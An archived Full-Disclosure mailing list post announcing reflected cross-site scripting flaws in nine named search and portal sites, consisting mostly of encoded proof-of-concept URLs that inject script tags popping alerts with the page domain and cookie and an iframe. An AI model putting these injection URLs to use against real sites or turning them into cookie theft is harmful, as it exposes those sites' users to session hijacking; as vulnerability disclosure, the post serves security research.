| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Search Engine XSS
since were on the subject now... ill clear up my backlog...
Sites Affected...
Overture
Altavista
MetaCrawler
Excite
Webcrawler
InfoPlease
MarketWatch
Icq
Looksmart
http://www.overture.com/d/search/;$sessionid$EVV5ZDIABJG13QFIEEOQPUQ?Keywords=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
http://www.altavista.com/web/results?pg=q&user=icq&q=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
http://www.metacrawler.com/_1_2IWUTDE03H14GMK__info.metac/dog/webresults.htm?&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&qcat=web&method=0&top=1&start=&ver=4049
http://msxml.excite.com/_1_GMJTDE03H58B8U__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=13896
http://dpxml.webcrawler.com/_1_HEMTDE03GPDFH2__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+
to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%
3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSC
RIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%
3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=22324
http://www.infoplease.com/search.php3?src=icq&query=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&in=all
http://bigcharts.marketwatch.com/symbollookup/symbollookupresults.asp?symb=<script>alert("You%20are%20vunerable%20to%20xss%20-%20discovered%20by%20morning_wood%20http://exploitlabs.com")</script><SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><iframe%20src="http://whatismyip.com"></iframe>&country=all&type=all
http://search.icq.com/search/results?q=%3Cscript%3Ealert%28%22You+are+vunerable+to+xss+%2D+discovered+by+morning%5Fwood+http%3A%2F%2Fexploitlabs%2Ecom%22%29%3C%2Fscript%3E%3CSCRIPT%3Ealert%28document%2Edomain%29%3B%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3B%3C%2FSCRIPT%3E%3Ciframe+src%3D%22http%3A%2F%2Fwhatismyip%2Ecom%22%3E%3C%2Fiframe%3E
http://www.looksmart.com/r_search?l&key=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&search=0
this just shows the basics, some are worse than others...
so I guess thats all of em...
Donnie Werner
morning_wood@...loitlabs.com
http://exploitlabs.com
Powered by blists - more mailing lists